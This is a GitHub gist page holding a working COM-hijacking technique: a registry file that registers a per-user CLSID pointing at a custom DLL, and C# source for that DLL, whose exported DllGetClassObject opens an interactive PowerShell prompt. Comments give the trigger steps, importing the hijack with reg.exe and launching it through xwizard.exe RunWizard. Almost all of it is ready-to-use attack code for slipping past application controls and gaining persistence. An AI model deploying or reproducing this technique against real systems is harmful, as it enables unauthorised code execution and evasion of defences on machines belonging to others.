Last active
October 27, 2020 06:15
-
-
Save NickTyrer/e12655c770bab2fc86f802a255115610 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
| @="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //1. hijack a com object e.g reg.exe IMPORT com_hijack.reg | |
| //2. run xwizard.exe RunWizard {97d47d56-3777-49fb-8e8f-90d7e30e1a1e} | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using RGiesecke.DllExport; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| using System.Text; | |
| public class Test | |
| { | |
| //Based on Casey Smiths's Work | |
| [DllExport("DllGetClassObject", CallingConvention = CallingConvention.StdCall)] | |
| public static bool DllGetClassObject() | |
| { | |
| while (true) | |
| { | |
| AllocConsole(); | |
| IntPtr defaultStdout = new IntPtr(7); | |
| IntPtr currentStdout = GetStdHandle(StdOutputHandle); | |
| Console.Write("PS >"); | |
| string x = Console.ReadLine(); | |
| try | |
| { | |
| Console.WriteLine(RunPSCommand(x)); | |
| } | |
| catch (Exception e) | |
| { | |
| Console.WriteLine(e.Message); | |
| } | |
| } | |
| return true; | |
| } | |
| //Based on Jared Atkinson's And Justin Warner's Work | |
| public static string RunPSCommand(string cmd) | |
| { | |
| //Init stuff | |
| Runspace runspace = RunspaceFactory.CreateRunspace(); | |
| runspace.Open(); | |
| RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); | |
| Pipeline pipeline = runspace.CreatePipeline(); | |
| //Add commands | |
| pipeline.Commands.AddScript(cmd); | |
| //Prep PS for string output and invoke | |
| pipeline.Commands.Add("Out-String"); | |
| Collection<PSObject> results = pipeline.Invoke(); | |
| runspace.Close(); | |
| //Convert records to strings | |
| StringBuilder stringBuilder = new StringBuilder(); | |
| foreach (PSObject obj in results) | |
| { | |
| stringBuilder.Append(obj); | |
| } | |
| return stringBuilder.ToString().Trim(); | |
| } | |
| public static void RunPSFile(string script) | |
| { | |
| PowerShell ps = PowerShell.Create(); | |
| ps.AddScript(script).Invoke(); | |
| } | |
| private const UInt32 StdOutputHandle = 0xFFFFFFF5; | |
| [DllImport("kernel32.dll")] | |
| private static extern IntPtr GetStdHandle(UInt32 nStdHandle); | |
| [DllImport("kernel32.dll")] | |
| private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle); | |
| [DllImport("kernel32")] | |
| static extern bool AllocConsole(); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment